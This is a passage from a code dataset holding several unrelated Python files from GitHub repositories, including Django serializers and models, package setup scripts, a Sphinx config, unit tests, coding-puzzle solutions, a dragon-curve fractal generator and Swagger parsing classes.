Customer=Partiesserializer(read_only=True)\n Party=Partiesserializer(read_only=True)\n IBChallanItems = IBChallanItemsSerializer(many=True)\n class Meta:\n model = T_InterbranchChallan\n fields = ['IBChallanDate', 'IBChallanNumber', 'FullIBChallanNumber', 'CustomerGSTTin', 'GrandTotal', 'RoundOffAmount', 'CreatedBy', 'UpdatedBy', 'Customer', 'Party', 'IBChallanItems'] \n ","repo_name":"attribsolutions/DeepManthan","sub_path":"FoodERP/FoodERPApp/Serializer/S_InterBranchInward.py","file_name":"S_InterBranchInward.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42125502860","text":"\"\"\"\nA setup.py file based on the kennethreitz/setup.py on GitHub.\n\"\"\"\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Note: To use the 'upload' functionality of this file, you must:\n# $ pip install twine\n\nimport os\nimport sys\nfrom shutil import rmtree\n\nfrom setuptools import find_packages, setup, Command\n\n# Package meta-data.\nNAME = 'mgl2d'\nDESCRIPTION = 'Simple 2D game library using PySDL2 and modern OpenGL'\nLONGDESCRIPTION = 'See the README.md file on GitHub for more information.'\nURL = 'https://github.com/maxfish/mgl2d'\nEMAIL = 'massimiliano.pesce@gmail.com'\nAUTHOR = 'Massimiliano Pesce'\nVERSION = '0.9.9'\n\n# What packages are required for this module to be executed?\nREQUIRED = [\n 'numpy == 1.22.0',\n 'Pillow == 9.3.0',\n 'PyOpenGL == 3.1.0',\n 'PySDL2 == 0.9.6',\n 'PyTMX == 3.21.1'\n]\n\n# The rest you shouldn't have to touch too much :)\n# ------------------------------------------------\n# Except, perhaps the License and Trove Classifiers!\n# If you do change the License, remember to change the Trove Classifier for that!\n\nhere = os.path.abspath('pypi/')\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py upload.\"\"\"\n description = 'Build and publish the package.'\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Prints things in bold.\"\"\"\n print('\\033[1m{0}\\033[0m'.format(s))\n\n def initialize_options(self):\n \"\"\"Initialization options.\"\"\"\n pass\n\n def finalize_options(self):\n \"\"\"Finalize options.\"\"\"\n pass\n\n def run(self):\n \"\"\"Remove previous builds.\"\"\"\n try:\n self.status('Removing previous builds...')\n rmtree(os.path.join(here, 'dist'))\n except OSError:\n pass\n\n self.status('Building Source and Wheel distribution...')\n os.system('{0} setup.py sdist bdist_wheel'.format(sys.executable))\n\n self.status('Uploading the package to PyPI via Twine...')\n os.system('twine upload dist/*')\n\n sys.exit()\n\n\n# Where the magic happens:\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONGDESCRIPTION,\n author=AUTHOR,\n author_email=EMAIL,\n url=URL,\n packages=find_packages(exclude=('tests',)),\n install_requires=REQUIRED,\n include_package_data=True,\n license='MIT',\n python_requires='>=3.6',\n classifiers=[\n # Trove classifiers\n # Full list at https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Games/Entertainment',\n 'Topic :: Multimedia :: Graphics',\n ],\n # $ setup.py publish support.\n cmdclass={\n 'upload': UploadCommand,\n },\n)\n","repo_name":"maxfish/mgl2d","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"5943421236","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport re\n\n# If we are building locally, or the build on Read the Docs looks like a PR\n# build, prefer to use the version of the theme in this repo, not the installed\n# version of the theme.\ndef is_development_build():\n # PR builds have an interger version\n re_version = re.compile(r'^[\\d]+$')\n if 'READTHEDOCS' in os.environ:\n version = os.environ.get('READTHEDOCS_VERSION', '')\n if re_version.match(version):\n return True\n return False\n return True\n\nif is_development_build():\n sys.path.insert(0, os.path.abspath('..'))\n\n# Append location of ukbiobank.ukbio class to path (for autogeneration of API docstring . . )\nsys.path.append(os.path.abspath('../'))\n\nimport ukbiobank.filtering\n\nimport sphinx_rtd_theme\nfrom sphinx.locale import _\n\nproject = u'UKBiobank-tools'\nslug = re.sub(r'\\W+', '-', project.lower())\nversion = '0.1.9'\nrelease = '0.1.9'\nauthor = u'JNecus'\ncopyright = author\nlanguage = 'en'\n\nextensions = [\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.autodoc',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.viewcode',\n 'sphinxcontrib.httpdomain',\n 'sphinx_rtd_theme',\n 'sphinx.ext.napoleon',\n]\n\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nexclude_patterns = []\nlocale_dirs = ['locale/']\ngettext_compact = False\n\nmaster_doc = 'index'\nsuppress_warnings = ['image.nonlocal_uri']\npygments_style = 'default'\n\nintersphinx_mapping = {\n 'rtd': ('https://docs.readthedocs.io/en/latest/', None),\n 'sphinx': ('http://www.sphinx-doc.org/en/stable/', None),\n}\n\nhtml_theme = 'sphinx_rtd_theme'\nhtml_theme_options = {\n 'logo_only': True,\n 'navigation_depth': 5,\n}\nhtml_context = {}\n\nif not 'READTHEDOCS' in os.environ:\n html_static_path = ['_static/']\n html_js_files = ['debug.js']\n\n # Add fake versions for local QA of the menu\n html_context['test_versions'] = list(map(\n lambda x: str(x / 10),\n range(1, 100)\n ))\n\nhtml_logo = \"examples/static/logo.png\"\nhtml_show_sourcelink = True\n\nhtmlhelp_basename = slug\n\n\nlatex_documents = [\n ('index', '{0}.tex'.format(slug), project, author, 'manual'),\n]\n\nman_pages = [\n ('index', slug, project, [author], 1)\n]\n\ntexinfo_documents = [\n ('index', slug, project, author, slug, project, 'Miscellaneous'),\n]\n\n\n# Extensions to theme docs\ndef setup(app):\n from sphinx.domains.python import PyField\n from sphinx.util.docfields import Field\n\n app.add_object_type(\n 'confval',\n 'confval',\n objname='configuration value',\n indextemplate='pair: %s; configuration value',\n doc_field_types=[\n PyField(\n 'type',\n label=_('Type'),\n has_arg=False,\n names=('type',),\n bodyrolename='class'\n ),\n Field(\n 'default',\n label=_('Default'),\n has_arg=False,\n names=('default',),\n ),\n ]\n )\n","repo_name":"jnecus/ukbiobank-tools","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"7013949774","text":"\"Ordered dictionary tests\"\n\nimport unittest\n\n# test target\nfrom openpgp.sap.util.ordict import ordict\n\nclass A00DictionaryTests(unittest.TestCase):\n \"\"\"\n \"\"\"\n def testA01(self):\n \"util.ordict: __setitem__/__getitem__\"\n d = ordict()\n d['a'] = 23\n self.assertEqual(23, d['a'])\n\n def testA02(self):\n \"util.ordict: index access == keyword access\"\n d = ordict()\n d['a'] = 22\n self.assertEqual(d['a'], d[0])\n\n def testA03(self):\n \"util.ordict: __delitem__ via index\"\n d = ordict()\n d['a'] = 22\n d['b'] = 33\n del d[0]\n self.assertEqual(d.list(), [33])\n\nif '__main__' == __name__:\n unittest.main()\n","repo_name":"BackupTheBerlios/pgpyp-svn","sub_path":"trunk/test/sap/public/test_03_ordict.py","file_name":"test_03_ordict.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25123180254","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'initialize' function below.\n#\n# The function accepts STRING s as parameter.\n#\nfrom collections import Counter\n\n\ndef answerQuery(s, l, r):\n # Return the answer for this query modulo 1000000007.\n x = s[l - 1:r]\n c = dict(Counter(x))\n m = {}\n n = {}\n for key, val in c.items():\n m[key] = val // 2\n n[key] = val % 2\n m = list(m.values())\n n = list(n.values())\n m = [i for i in m if i != 0]\n c1 = n.count(1)\n sum1 = math.factorial(sum(m))\n prod = 1\n for i in m:\n prod = prod * math.factorial(i)\n if (c1 == 0):\n res = sum1 // prod\n else:\n res = sum1 // prod * c1\n print(res % (pow(10, 9) + 7))\n return\n\n\nif __name__ == '__main__':\n s = list(input())\n\n q = int(input().strip())\n\n for q_itr in range(q):\n first_multiple_input = input().rstrip().split()\n\n l = int(first_multiple_input[0])\n\n r = int(first_multiple_input[1])\n\n result = answerQuery(s, l, r)\n","repo_name":"hatienl0i261299/HackerRank.com-Code-by-python-ver-3","sub_path":"Maximum Palindromes.py","file_name":"Maximum Palindromes.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5471463260","text":"import setuptools\n\n\ndef main():\n with open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\n setuptools.setup(\n name=\"xoa-utils\",\n entry_points={\n \"console_scripts\": [\n \"xoa-utils = xoa_utils.entry:main\",\n ]\n },\n description=(\n \"Xena OpenAutomation ANLT Utility provides a shell-like command-line interface for users to do\"\n \" ANLT tests interactively.\"\n ),\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Ron Ding, Leonard Yu\",\n author_email=\"rdi@xenanetworks.com, hyu@xenanetworks.com\",\n maintainer=\"Xena Networks\",\n maintainer_email=\"support@xenanetworks.com\",\n url=\"https://github.com/xenanetworks/open-automation-utilities\",\n packages=setuptools.find_packages(),\n license=\"Apache 2.0\",\n install_requires=[\n \"typing_extensions>=4.4.0\",\n \"cffi>=1.15.1\",\n \"cryptography>=39.0.0\",\n \"pycparser>=2.21\",\n \"colorama>=0.4.6\",\n \"idna>=3.4\",\n \"asyncssh>=2.13.0\",\n \"asyncclick>=8.1.3.4\",\n \"anyio>=3.6.2\",\n \"loguru>=0.6.0\",\n \"pdoc>=12.3.1\",\n \"pytest>=7.2.1\",\n \"psutil>=5.9.4\",\n \"xoa-driver>=2.3.0\",\n ],\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n ],\n python_requires=\">=3.8\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xenanetworks/open-automation-utilities","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19667717846","text":"# logic: similar to \"Two Sum\".\n# but here we can't find the other number directly like \"Two Sum\".\n\n# for finding the other number 'want' first we find the gcd(n, k) then want= k//gcd.\n\n# we have to find the product which is divisible by k so for example if we need to make a pair which is\n# divisible by 10 so by far we have found 12 so the gcd of 12,10 will be 2 now what is the other \n# counter we need to find it is 5 hence if we find 5's multiple or 5 we will add this pair to answer.\n\n# time= (n* sqrt(n)) .\n# since max number of divisor any number 'n' can have <= 2 * sqrt(n).\n\nimport math\nclass Solution:\n def countPairs(self, nums: List[int], k: int) -> int:\n frequency= collections.defaultdict(int)\n ans= 0\n for n in nums:\n Gcd= math.gcd(n, k)\n want= k // Gcd # every num which is multiple of 'want' and what we have already seen will contribute to the ans.\n # So add frequency of all such num\n for num in frequency:\n if num % want== 0:\n ans+= frequency[num]\n\n frequency[Gcd]= 1 + frequency.get(Gcd, 0)\n return ans\n\n\n# Note vvi: Also do by other Two methods (link in sheet).\n","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Hashing/2183. Count Array Pairs Divisible by K.py","file_name":"2183. Count Array Pairs Divisible by K.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"12175462429","text":"import typing\n\nfrom registerer.exceptions import RegistrationError\n\n\nclass RegistryValidator:\n \"\"\"\n a utility for custom validation with the Registerer.\n you can subclass this and override the on_register method, and raise an exception if you must.\n\n \"\"\"\n\n def __init__(self, validator, *, error: typing.Optional[str] = None) -> None:\n self.validator = validator\n self.error = error\n\n def __call__(self, item):\n \"\"\"\n this function will be called when registering an item\n\n args:\n item (Any): the item that is being registered (the class or function)\n \"\"\"\n if not self.validator(item):\n raise RegistrationError(\n self.error if self.error else f\"custom validation failed when registering {item.__name__}\"\n )\n","repo_name":"danialkeimasi/python-registerer","sub_path":"registerer/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"28264632264","text":"# AUTHOR: Sibyl System\n# DATE: 2018-03-06\n# DESC: wordvector clustering\n\n'''\n详细说明:\n将计算完成的词向量装进数据库\nt_word_detail\n'''\n\nimport re\nimport math\nimport json\nimport sys\nimport os\nimport numpy as np\nfrom foundations.utils import *\nfrom foundations.log import CLog\nfrom config.inits import LOG_CFG\nfrom preprocessors.batch_proc import *\nfrom gensim.models import Word2Vec\nfrom preprocessors.prep_db_handle import CPrepDbHandle\n\n#全局变量\nmodel_save_path = '/home/caonimabi/develop/job_data_mining/clusters/models/w2v_model'\nDB_UPDATE_BATCH_SIZE = 10000 # 单次更新DB的行数,视内存大小而定\n \nclass CVectorLoader(BatchProc):\n def __init__(self):\n super(CVectorLoader, self).__init__(\"word_vector_loader\",3)\n self.word_vector = {}\n self.model = Word2Vec.load(model_save_path)\n \n def _reset_monitor(self):\n super(CVectorLoader, self)._reset_monitor()\n self.word_vector = {}\n \n def _find_vectors(self,item):\n word = item[\"Fword\"]\n self.word_vector[word] = self.model.wv[word]\n \n # 将每批处理结果讯息打印日志\n def gen_batch_report(self):\n UPlay = self.abyss[\"UPlay\"]\n UPoison = self.abyss[\"UPoison\"]\n URdead = self.abyss[\"URdead\"]\n Usurvive = self.abyss[\"Usurvive\"]\n \n if UPlay!=0:\n self.logger.log_info(\"You played %s times, survive %s times, \\\n poisoned %s times, died %s times.\\n \\\n survival rate: %s, poison rate: %s, death rate: %s.\"\\\n %(UPlay, Usurvive, UPoison, URdead, \\\n Usurvive/(UPlay), UPoison/UPlay, URdead/UPlay))\n else:\n self.logger.log_info(\"You processed zero content, please check your Sql\")\n \n def update_word_vector(self):\n self._db.set_db_table('db_hiddens','t_word_detail')\n field_list = ['Fword','Fword_vector','Fmodify_time']\n data_list = []\n \n for word, vector in self.word_vector.items():\n modify_time = time_now()\n vector_string = json.dumps([str(num) for num in list(vector)])\n element = str((word, vector_string, modify_time))\n data_list.append(element)\n \n self._db.update_batch(field_list, data_list)\n self._db.commit()\n \n def process_doc(self,item):\n try:\n self._find_vectors(item)\n except Exception as e:\n self._failsafe(e,item)\n finally:\n self._bonfire()\n \n def run(self,items):\n for item in items:\n self.process_doc(item)\n \n self.update_word_vector()\n self.gen_batch_report()\n self._reset_monitor()\n \n def main(self):\n self.init_db()\n self.init_log()\n step = 10000\n offset = 0\n \n #self.logger.log_info('step:%s, offset:%s' %(step,offset))\n \n while(True):\n where = \"Fauto_id between %s and %s\"%(offset+1,offset+step)\n field_list = ['*']\n self._db.set_db_table('db_hiddens','t_word_detail')\n items = self._db.query(field_list, where)\n self._db.commit()\n \n if not items:\n break\n self.run(items)\n offset += step\n # break\n self.close()\n \n\nif __name__ == '__main__':\n #with open('./sample.txt', 'r') as file:\n # content = file.read()\n loader = CVectorLoader()\n loader.main()\n \n \n \n","repo_name":"yunjianblackfyre/Job-Data-Mining","sub_path":"job_data_mining/clusters/vector_loader.py","file_name":"vector_loader.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"36107343492","text":"import torch\n\n\ndef encode_onehot(labels, device):\n classes = set(labels)\n classes_dict = {c: torch.eye(len(classes), device=device)[i, :] for i, c in\n enumerate(classes)}\n labels_onehot = torch.tensor(\n list(map(classes_dict.get, labels)),\n dtype=torch.int32,\n device=device\n )\n return labels_onehot\n","repo_name":"Helmholtz-AI-Energy/BaumBauen","sub_path":"src/baumbauen/utils/encoder_onehot.py","file_name":"encoder_onehot.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"20790867996","text":"# coding=utf-8\nimport os\n\ncurrentDir = os.getcwd()\npathConfig = \"config.json\"\npathPluginsDir = \"plugins\"\npluginsDir = currentDir + \"/\" + pathPluginsDir\npathAssetsDir = \"assets\"\nassetsDir = currentDir + \"/\" + pathAssetsDir\npathCacheDir = \"cache\"\ncacheDir = currentDir + \"/\" + pathCacheDir\npathApiDir = \"api\"\napiDir = currentDir + \"/\" + pathApiDir\npathLogDir = \"logs\"\nlogDir = currentDir + \"/\" + pathLogDir\npathTmpDir = \"tmp\"\ntmpDir = currentDir + \"/\" + pathTmpDir\ndirs = [pluginsDir, logDir, apiDir, cacheDir, tmpDir, assetsDir]\n\npathThreadApi = \"thread.json\"\n\nReply = \"REPLY\"\nTimeline = \"TIMELINE\"\nDM = \"DM\"\nEvent = \"EVENT\"\nOther = \"OTHER\"\nRegular = \"REGULAR\"\nThread = \"THREAD\"\nInitializer = \"INITIALIZER\"\n\npluginReply = \"reply\"\npluginTimeline = \"timeline\"\npluginDM = \"dm\"\npluginEvent = \"event\"\npluginThread = \"thread\"\npluginRegular = \"regular\"\npluginOther = \"other\"\npluginInitializer = \"initializer\"\n\npluginTypes = [\n\tpluginReply,\n\tpluginTimeline,\n\tpluginDM,\n\tpluginEvent,\n\tpluginThread,\n\tpluginRegular,\n\tpluginOther,\n\tpluginInitializer\n]\n\nmessageLogFormat = \"[%(asctime)s][%(threadName)s %(name)s/%(levelname)s]: %(message)s\"\nmessageLogTimeFormat = \"%H:%M:%S\"\nmessageLogDatetimeFormat = \"%Y-%m-%d_%H-%M-%S\"\nmessageSuccessInitialization = \"Initialization Complate. Current time is {0}.\"\nmessageErrorLoadingPlugin = \"Plugin \\\"{0}\\\"({1}) could not be loaded. Error Detail:\\n{2}\"\nmessageSuccessLoadingPlugin = \"Plugin \\\"{0}\\\"({1}) has been loaded successfully.\"\nmessageSuccessExecutingRegularPlugin = \"Regular plugin \\\"{0}\\\" was executed successfully.\"\nmessageErrorExecutingRegularPlugin = \"Regular plugin \\\"{0}\\\" could not be executed. Error Detail:\\n{1}\"\nmessageSuccessConnectingUserStream = \"TBFW started @{0}'s streaming.\"\nmessageErrorConnectingUserStream = \"Error occured while connecting to @{0}'s stream. TBFW will reconnect after {1} seconds.\"\nmessageErrorProcessingStream = \"Error occured while processing @{0}'s stream.\"\nmessageErrorExecutingPlugin = \"Error occured while executing plugin \\\"{0}\\\".\"\nmessageTweetErrorExecutingPlugin = \"@{0} Error occured while executing plugin \\\"{1}\\\". Please retry in minutes.\\n\\n詳細: {2}\"\nmessageErrorConnectingTwitter = \"Error occured while connecting to Twitter with HTTP Status Code {0}.\"\n\nreconnectUserStreamSeconds = 10\n\npluginAttributeTarget = \"TARGET\"\npluginAttributePriority = \"PRIORITY\"\npluginAttributeAttachedStream = \"ACCOUNT\"\npluginAttributeRatio = \"RATIO\"\npluginAttributeHour = \"HOUR\"\npluginAttributeMultipleHour = \"MULTIPLE_HOUR\"\npluginAttributeMinute = \"MINUTE\"\npluginAttributeMultipleMinute = \"MULTIPLE_MINUTE\"\n\ndefaultAttributeValid = None\ndefaultAttributePath = None\ndefaultAttributeSize = None\ndefaultAttributeName = None\ndefaultAttributeTarget = None\ndefaultAttributePriority = 0\ndefaultAttributeAttachedStream = 0\ndefaultAttributeRatio = 1\ndefaultAttributeHour = None\ndefaultAttributeMultipleHour = None\ndefaultAttributeMinute = None\ndefaultAttributeMultipleMinute = None\n\ndayStartHour = 0\noneHourMinutes = 60\noneDayHours = 24\n","repo_name":"Cocoalatte/TwitterBotFramework","sub_path":"TBFW/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"74400842320","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Evento(models.Model):\n # tipo do campo e seu limite\n titulo = models.CharField(max_length=100)\n # quer dizer que pode ficar em branco e igual a nulo\n descricao = models.TextField(blank=True, null=True)\n data_evento = models.DateTimeField(verbose_name='Data do Evento')\n # esse dato tem que ser automatico\n data_criacao = models.DateTimeField(auto_now=True)\n usuario = models.ForeignKey(User, on_delete=models.CASCADE)\n\n class Meta:\n db_table = 'evento'\n\n def __str__(self):\n return self.titulo\n\n","repo_name":"geovanavillafranca/agenda","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23505850106","text":"from django.urls import path, include\nfrom .views import *\n\n# sets the namespace\napp_name = 'employee'\n# directs the urls from root\nurlpatterns = [\n path('auth/', include('django.contrib.auth.urls')),\n path('employee/password/<int:emp_id>', employee_password, name='emp_pass'),\n\n # manager management URL\n path('manager/home/', mgr_home, name='mgr_home'),\n path('manager/search/', mgr_search, name='mgr_search'),\n path('manager/create/', mgr_create, name='mgr_create'),\n path('manager/info/<int:mgr_id>', mgr_info, name='mgr_view'),\n path('manager/edit/<int:mgr_id>', mgr_edit, name='mgr_edit'),\n path('manager/remove/<int:mgr_id>', mgr_delete, name='mgr_delete'),\n\n # teller management URL\n path('teller/home/', teller_home, name='teller_home'),\n path('teller/search/', teller_search, name='teller_search'),\n path('teller/create/', teller_create, name='teller_create'),\n path('teller/info/<int:tlr_id>', teller_info, name='teller_view'),\n path('teller/edit/<int:tlr_id>', teller_edit, name='teller_edit'),\n path('teller/remove/<int:tlr_id>', teller_delete, name='teller_delete'),\n\n # advisor management URL\n path('advisor/home/', advisor_home, name='advisor_home'),\n path('advisor/search/', advisor_search, name='advisor_search'),\n path('advisor/create/', advisor_create, name='advisor_create'),\n path('advisor/info/<int:adv_id>', advisor_info, name='advisor_view'),\n path('advisor/edit/<int:adv_id>', advisor_edit, name='advisor_edit'),\n path('advisor/remove/<int:adv_id>', advisor_delete, name='advisor_delete'),\n\n\n]\n","repo_name":"AhmadJanjua/BankManagementSystem","sub_path":"employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40626279874","text":"from sandable import Sandable\nfrom dialog import DialogInt, DialogYesNo, DialogBreak, DialogFloat\nfrom Chains import Chains\n\n\nclass Sander(Sandable):\n \"\"\"\n### Dragon Fractal\n\n#### Hint\n\nRead the Wikipedia article on [Dragon Curves](http://en.wikipedia.org/wiki/Dragon_curve)\n\n#### Parameters\n\n* **Depth of fractility** - number of times that lines will be replaced with the dragon shape.\n* **Auto-fit to table** - if this is set to \"Yes\" then the curve is automatically stretched\n in both dimensions (width and length) to make it fit the table. If this is set to \"No\" then the\n curve is scaled evenly to be as big as possible without distortion.\n* **X and Y Origin** - lower left corner of the drawing. Usually not worth changing.\n* **Width** and **Length** - how big the figure should be. Probably not worth changing.\n\"\"\"\n\n def __init__(self, width, length, ballSize, units):\n self.editor = [\n DialogInt(\"depth\", \"Depth of fractility\", default=8, min=1, max=14),\n DialogYesNo(\"fit\", \"Auto-fit to table\", default=False),\n DialogBreak(),\n DialogFloat(\"xOffset\", \"X Origin\", units=units, default=0.0),\n DialogFloat(\"yOffset\", \"Y Origin\", units=units, default=0.0),\n DialogFloat(\"width\", \"Width (x)\", units=units, default=width),\n DialogFloat(\"length\", \"Length (y)\", units=units, default=length),\n ]\n\n def generate(self, params):\n self.x = 0.0\n self.y = 0.0\n self.dx = 1.0\n self.dy = 0.0\n self.chain = [(self.x, self.y)]\n self.dragon(params.depth, 0)\n bounds = [(params.xOffset, params.yOffset), (params.xOffset+params.width, params.yOffset+params.length)]\n if params.fit:\n return Chains.fit([self.chain], bounds)\n return Chains.autoScaleCenter([self.chain], bounds)\n\n def dragon(self, level, turn):\n if level == 0:\n self.x += self.dx\n self.y += self.dy\n self.chain.append((self.x, self.y))\n else:\n self.dragon(level - 1, 0)\n if turn:\n self.dx, self.dy = self.dy, -self.dx\n else:\n self.dx, self.dy = -self.dy, self.dx\n self.dragon(level - 1, 1)\n","repo_name":"dubnom/sandtable","sub_path":"src/draw/Dragon.py","file_name":"Dragon.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"3"} +{"seq_id":"29236163353","text":"import asyncio\nimport time\nimport random\nimport numpy as np\nimport socket\nimport pickle\n\n#implementando con diccionario\n\nmin_price = 20_000\nmax_price = 999_000\nmi_diccionario = {\"a\": 0, \"b\": 0, \"c\": 0, \"d\": 0, \"e\": 0}\nmi_diccionario[\"sniper\"] = 0 #para agregar el nuevo al diccionario\n\n\ntsubasta = 60\ninicio =0\n\nasync def reofertar(idx: str):\n global min_price\n global max_price\n\n if random.randint(0, 1):\n if mi_diccionario[idx]:\n max_oferta = max(mi_diccionario.values())\n min_price = max_oferta + 500\n max_price = min_price * 1.2\n\n valor = random.randint(min_price, int(max_price))\n mi_diccionario[idx]=valor\n print(f\"Participante {idx} hizo reoferta de: {valor}\")\n await asyncio.sleep(random.randint(0, 10))\n\nasync def sniper():\n with open(\"oferta_del_sniper.txt\", \"r\") as f:\n valor = int(f.read())\n mi_diccionario[\"sniper\"] = valor\n print(f\"Participante Sniper hizo reoferta de: {valor}\")\n\n\n# Programa servidor\nasync def server():\n SOCK_BUFFER =1024\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('localhost',5000)\n sock.bind(server_address)\n sock.listen(5)\n client_socket, client_address = sock.accept()\n data= client_socket.recv(SOCK_BUFFER) #espera que le llegue\n deserialized_data = pickle.loads(data)\n with open(\"oferta_del_sniper.txt\", \"w\") as f:\n f.write(deserialized_data)\n\n sock.close()\n\n\n# Programa cliente\nasync def client():\n SOCK_BUFFER =1024\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('localhost',5000)\n sock.connect(server_address)\n number = input(\"Ingresa el numero: \")\n serialized_data = pickle.dumps(number)\n sock.sendall(serialized_data)\n\n sock.close()\n\n\n\nasync def main():\n global inicio \n inicio = time.perf_counter()\n while time.perf_counter() - inicio <= tsubasta - 3:\n await asyncio.gather(reofertar(\"a\"), reofertar(\"b\"), reofertar(\"c\"), reofertar(\"d\"), reofertar(\"e\"))\n \n await asyncio.gather(server(), client())\n await sniper()\n\n print(f\"Ofertas finales: {mi_diccionario}\") \n print(f\"El ganador es: {max(mi_diccionario.items(), key=lambda x: x[1])[0]}\")\n\nif __name__ == \"__main__\":\n asyncio.run(main())","repo_name":"leleletus/arquitectura_x86_64","sub_path":"labs/10/pregunta3.py","file_name":"pregunta3.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27158181461","text":"\n\nclass Field(object):\n\n def __init__(self, name, data, for_write=False):\n self.name = name\n self.data = data\n self.required = data.get('required', False)\n self.read_only = data.get('readOnly', False)\n self.write_only = data.get('writeOnly', False)\n self.type = data.get('type', '')\n self.format = data.get('format', '')\n self.items = data.get('items', {})\n\n if self.type == 'array':\n itme_type = list(data['items'].values())[0]\n self.type = itme_type + '[]'\n if 'serializer' in self.type.lower() and for_write:\n self.type = 'Write' + self.type\n\n self.required_json = 'true' if self.required else 'false'\n\n def __repr__(self):\n return self.name\n\n\nclass Serializer(object):\n\n def __init__(self, data):\n self.data = data\n self.id = data['id']\n\n if self.id.startswith('Write'):\n self.name = self.id[5:]\n self.category = 'write'\n else:\n self.name = self.id\n self.category = 'read'\n\n self.fields = []\n for field_name, field_data in data['properties'].items():\n for_write = (self.category == 'write')\n field = Field(field_name, field_data, for_write)\n self.fields.append(field)\n\n def __repr__(self):\n return self.id\n\n\nclass Parameter(object):\n \n def __init__(self, data):\n self.data = data\n self.param_type = data['paramType']\n self.name = data['name']\n self.type = data.get('type')\n self.required = data.get('required', False)\n self.description = data.get('description')\n self.enum = data.get('enum', [])\n\n self.required_json = 'true' if self.required else 'false'\n\n def __repr__(self):\n return self.name\n\n\nclass Operation(object):\n \n def __init__(self, data):\n self.patch = None\n self.data = data\n\n self.nickname = data['nickname']\n self.notes = data['notes']\n self.summary = data['summary']\n self.method = data['method'].lower()\n self.type = data['type']\n self.items = data.get('items', {})\n\n self.action_name = self.nickname.strip().split('_')[-1]\n\n self.path_parameters = []\n self.query_parameters = []\n self.form_parameters = []\n\n for parameter_data in data['parameters']:\n parameter = Parameter(parameter_data)\n\n if parameter.param_type == 'path':\n self.path_parameters.append(parameter)\n\n if parameter.param_type == 'query' and self.action_name == 'list':\n self.query_parameters.append(parameter)\n\n if parameter.param_type == 'form':\n self.form_parameters.append(parameter)\n\n self.serializer_name = self.type\n if self.serializer_name == 'array':\n self.serializer_name = self.items.get('$ref', '') + '[]'\n\n self.serializer_name_write = self.serializer_name\n if 'serializer' in self.serializer_name_write.lower():\n self.serializer_name_write = 'Write' + self.serializer_name_write\n\n def __repr__(self):\n return self.nickname\n\n\nclass Api(object):\n\n def __init__(self, data):\n self.data = data\n self.path = data['path']\n self.description = data['description']\n self.operations = []\n for operation_data in data['operations']:\n operation = Operation(operation_data)\n self.operations.append(operation)\n\n def __repr__(self):\n return '<API:%s>' % self.path\n\n def 